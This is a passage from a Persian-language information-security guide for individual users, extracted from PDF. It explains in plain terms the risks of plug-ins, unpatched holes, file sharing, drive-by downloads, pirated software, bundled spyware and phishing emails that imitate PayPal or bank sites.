‫ﻫﺪﺍﻳﺖ ﻛﻨﺪ ﻛﻪ ﺷﺎﻳﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﺎ ﻓﺮﺯﻧﺪﺍﻧﺘﺎﻥ ﻣﻨﺎﺳﺐ ﻧﺒﺎﺷﺪ‪.‬‬
‫‪٧٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺯ ﺩﺍﺧﻞ ﺑﺮﻧﺎﻣﺔ ﺍﺻـﻠﻲ ﺭﺍ ﻣـﻲ ﺩﻫﻨـﺪ‪ .‬ﻧﻤﻮﻧـﺔ ﺭﺍﻳـﺞ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ‬
‫"‪ "Adobe Acrobat Reader‬ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﺪ ﻫﻨﮕﺎﻡ ﻣـﺮﻭﺭ ﻭﺏ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ‪ PDF‬ﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ‪plug-in‬ﻫــﺎ ﻳــﺎ ‪add-on‬ﻫــﺎ ﻧــﺼﺐ ﻣــﻲﺷــﻮﻧﺪ‬
‫ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﺍﻧﺠﺎﻡ ﻣـﻲﺩﻫـﺪ ‪ -‬ﻣﺎﻧﻨـﺪ‬
‫ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺩﻳـﺴﻚ ﻭ ﻧﻮﺷـﺘﻦ ﺭﻭﻱ ﺁﻥ ﻳـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ‬
‫ﺷﺒﻜﻪ ‪ -‬ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣـﺎﻧﻲ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻭ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﻣﺒﺪﺃ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻣـﻮﺭﺩ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺷﻜﺎﻻﺗﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻋﺎﻣـﻞ ﻳـﺎ‬
‫ﺩﻳﮕﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻟﻬﺎﻱ‬
‫ﺍﺧﻴﺮ ﺍﻛﺜﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺎ ﺳـﺮﻋﺖ ﻗﺎﺑـﻞ ﻗﺒـﻮﻟﻲ ﺑـﻪ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻛﺸﻒ ﻣﻲﺷـﻮﺩ ﭘﺎﺳـﺦ‬
‫ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﮔـﺴﺘﺮﺩﺓ‬
‫ﺍﺷﻜﺎﻻﺕ‪ ،‬ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺭﺍ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺒﻨﺪﻳﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ‬
‫‪٥٩‬‬
‫ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﻓﺎﻳــﻞ ﺩﺭ ﺍﺷــﻜﺎﻝ ﻣﺨﺘﻠــﻒ ﺩﺭ ﻫﻤــﺔ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺩﺭ ﻣﻴـﺎﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪﻱ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﭼﻨـﺪﻳﻦ ﺩﺳـﺘﮕﺎﻩ‬
‫ﻣﺨﺘﻠﻒ ﺩﺍﺭﻳﺪ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻳﻚ ﻗﺎﺑﻠﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ‬
‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺍﺯ ﺭﻭﺵ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ )ﻣﺜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻨﺎﺳـﺐ ﻭ ﻣﺤـﺪﻭﺩ‬
‫ﺑﻮﺩﻥ ﺍﻣﺘﻴﺎﺯ ﻧﻮﺷﺘﻦ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ( ﻧﺪﺍﺭﻳـﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﻫـﺮ ﻣﻬـﺎﺟﻤﻲ ﺩﺭ‬
‫ﺩﻧﻴﺎ ﻫﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺍﮔﺮ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻧﻮﺷﺘﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻬﺎﺟﻢ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧـﺴﺖ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺷﻜﻞ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ‪.‬‬
‫‪File Sharing‬‬
‫‪59‬‬
‫ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﺔ ‪download‬ﻫﺎ‬
‫‪٦٠‬‬
‫"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ ‪download‬ﻫﺎ" ﺯﻣﺎﻧﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﻪ ﻳﻚ‬
‫ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌــﻪ ﻣــﻲﻛﻨﻴــﺪ ﻭ ﺑﺮﻧﺎﻣــﻪ ‪ HTML‬ﻣﻮﺟــﻮﺩ ﺩﺭ‬
‫ﺻﻔﺤﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ‪ Java‬ﻳـﺎ ‪ ActiveX‬ﺭﺍ‬
‫ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﻛﻨــﺪ ﻭ ﺁﻥ ﺑﺮﻧﺎﻣــﻪ ﻧﻴــﺰ ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺩﻳﮕــﺮ ﺭﺍ‬
‫‪ download‬ﻣــﻲﻧﻤﺎﻳــﺪ‪ ،‬ﺁﻧــﺮﺍ ﺍﺟــﺮﺍ ﻣــﻲﻧﻤﺎﻳــﺪ‪ ،‬ﻳــﺎ ﻃــﻮﺭﻱ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﺁﻭﺭﺩ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻛﺪ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﻭﺍﺭﺩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﮔـﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ Java‬ﻳﺎ ‪ ActiveX‬ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﺍﺯ ﺷـﻤﺎ‬
‫ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﺩﻫﻨﺪ ﺍﺟﺎﺯﺓ ﻧﺼﺐ ﻛﺮﺩﻥ‬
‫ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ‪ download‬ﺷﻮﻧﺪ ﻭ‬
‫ﻫﺮﭼﻪ ﺭﺍ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻧﺼﺐ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‬
‫ﻣﻔﻬﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺴﺮﻭﻗﻪ ﻣﻔﻬﻮﻡ ﺗﺎﺯﻩﺍﻱ ﻧﻴﺴﺖ‪ .‬ﭼﻨـﺪﻳﻦ‬
‫ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﺟﻌﻠـﻲ ﻓﺮﻭﺧﺘـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻧﻬﺎ ‪ -‬ﻛﻪ ‪ Warez‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻧﻴﺰ‬
‫ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻣﺪﺗﻬﺎ ﭘﻴﺶ ﺍﻳﻦ ﺳﻮﺀ ﻇﻦ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﻳﻦ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺣﺘﻤـﺎﻝ‬
‫ﺑﻴﺸﺘﺮﻱ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺗﻌﻤﺪﹰﺍ ﺣﺎﻭﻱ ﻭﺻﻠﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮ ﻣﺠﺎﺯ ﺭﺍ ﻗﺎﺩﺭ‬
‫ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺼﺐ ﺍﻏﻠﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻫﺒـﺮﻱ‬
‫ﻧﻴــﺎﺯ ﺩﺍﺭﺩ‪ ،‬ﺍﻳــﻦ ﺭﻭﺵ ﻓﺮﺻــﺖ ﻣﻨﺎﺳــﺒﻲ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺷــﺪﻥ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻧﻜﺮﺩﻩﺍﻳﺪ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﺩ‪.‬‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﻨﻬﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺎﻟﻢ‬
‫ﺍﮔﺮﭼﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻛﺜـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ ‪download‬‬
‫ﻣﻲﻛﻨﻴﺪ ﺳﺎﻟﻢ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫‪ download‬ﺷﺪﻩ )ﻣﺨﺼﻮﺻﹰﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ( ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺩﻳﮕﺮﻱ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺷﻤﺎ ﻧﺼﺐ ﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺷـﺘﺮﺍﻙ‬
‫ﻣﺘﻘﺎﺑﻞ ﻓﺎﻳﻠﻬﺎ‪ ٦١‬ﺑﺴﻴﺎﺭ ﻣـﺴﺘﻌﺪ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻻ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ﻛـﻪ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻧﻮﻉ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺩﻳـﺎﺑﻲ ﻭ ﺍﻋﻤـﺎﻝ ﺗﻐﻴﻴـﺮ ﺩﺭ‬
‫ﻭﺏ ﻃﺒﻘﻪﺑﻨﺪﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﮔﺮﺩﺵ ﻭﺏ ﺷﻤﺎ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨـﺪ‪،‬‬
‫‪Drive By Downloads‬‬
‫‪Peer-to-Peer File Sharing‬‬
‫‪60‬‬
‫‪61‬‬
‫‪٧٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺍﻧﻮﺍﻉ ﺗﺒﻠﻴﻐﺎﺕ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﻣﻲﺁﻭﺭﻧﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﻣــﺪﻳﺮ ﺧــﻮﺩ ﮔــﺰﺍﺭﺵ ﻣــﻲﻧﻤﺎﻳﻨــﺪ‪ .‬ﺑﺮﺧــﻲ ﺍﺯ ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪﻫــﺎ‬
‫ﺩﺳﻴﺴﻪﺁﻣﻴﺰ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺪﻳﻦ ﺻﻮﺭﺕ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﻧﺪ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ‬
‫ﻛﻨﻨﺪ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮ ﻗﺎﺑﻞ ﺣﺬﻑ ﺑﺎﺷـﻨﺪ‪ .‬ﭼﻨـﻴﻦ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﺍﺭﺍﻱ‬
‫ﻳﻚ ﺍﺑﺰﺍﺭ ‪ uninstall‬ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ‪ ،‬ﺁﻥ ﺍﺑـﺰﺍﺭ‬
‫‪ uninstall‬ﺭﺍ ﭘﺎﻙ ﻣﻲ ﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﺑﺮﻧﺎﻣـﺔ ﺍﺻـﻠﻲ ﻫﻨـﻮﺯ ﻭﺟـﻮﺩ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪.‬‬
‫ﻫﻤﺔ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ‪ .‬ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ‬
‫ﻛﻪ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻔﺮﺳـﺘﻨﺪ ﻭ ﺩﺭ ﺁﻥ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺗﺮﻏﻴﺐ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣـﻮﺭﺩ ﻧﻈـﺮ‬
‫ﺧﻮﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺭﻭﺵ ﺳﻨﺘﻲ ﺣﻴﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﻪ ﺷﻤﺎ ﭼﻴﺰﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺪﺍﻥ ﻋﻼﻗﻤﻨﺪ ﻫـﺴﺘﻴﺪ ﺍﻣـﺎ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﻐﻮﻝ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣﻌﺮﻓـﻲﺷـﺪﻩ ﻫـﺴﺘﻴﺪ‬
‫ﺗﻌﺪﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺣﻤﻠﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺷﺎﻳﺪ‬
‫ﻧﻮﻋﻲ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ‪ download‬ﻛـﺮﺩﻩ )ﻣـﺸﺎﺑﻪ‬
‫"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ ‪download‬ﻫﺎ"( ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪.‬‬
‫ﺩﺭ ﺭﻭﺷــﻬﺎﻱ ﺟﺪﻳــﺪﺗﺮ‪ ،‬ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺩﻋــﺎ ﻣــﻲﻛﻨــﺪ ﻛــﻪ‬
‫ﺻﻮﺭﺗﺤـــﺴﺎﺑﻲ ﺍﺯ ‪) eBay‬ﭘﺎﻳﮕـــﺎﻩ ﻭﺏ ﻣﺰﺍﻳـــﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـــﺖ( ﻳـــﺎ‬
‫‪) PayPal‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻭ ﻳـﺎ ﺍﺯ ﻃـﺮﻑ‬
‫ﺑﺎﻧﻚ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻄﻤﺌﻦ ﺑﻨﻈﺮ ﻣﻲ ﺭﺳﺪ‬
‫ﻭ ﺑﻪ ﺷﻤﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﻻ‬
‫ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺍﻋﺘﺒـﺎﺭ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫‪URL‬ﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﺑـﺎ ‪URL‬ﻫـﺎﻱ‬
‫ﻣﻌﺘﺒــﺮ ﺑــﺴﻴﺎﺭ ﻣــﺸﺎﺑﻬﺖ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ‪ URL‬ﻭﺍﻗﻌــﻲ‬
‫‪ ،PayPal‬ﺁﺩﺭﺱ ‪ www.paypal.com‬ﺍﺳــﺖ‪ ،‬ﻭ ‪URL‬ﻱ‬
‫ﻛﻪ ﺩﺭ ﻧﺎﻣﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﺁﺩﺭﺱ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺻـﻔﺤﻪ‬
‫ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ URL ،‬ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ‬
‫ﺁﻥ ﺻﻔﺤﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ URL .‬ﻭﺍﻗﻌﻲ ﻛﻪ ﺑﻪ‬
‫ﻻ ﭘﻨﻬﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺼﻮﺭﺕ‬
‫ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬
‫ﻲ ﺭﺳﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺭﺳـﺎﻝ ﻣـﻲﺷـﻮﺩ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﻻ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﺩﺭﺱ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ؛ ﺍﻃﻼﻋﺎﺗﻲ‬
‫ﻧﻈﻴﺮ ﻧﺎﻡ ﻛﺎﻣﻞ ﻭ ﻳﺎ ﭼﻬﺎﺭ ﺭﻗﻢ ﺁﺧﺮ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ‪ .‬ﺍﮔـﺮ‬
‫ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ ،‬ﺑﻪ‬
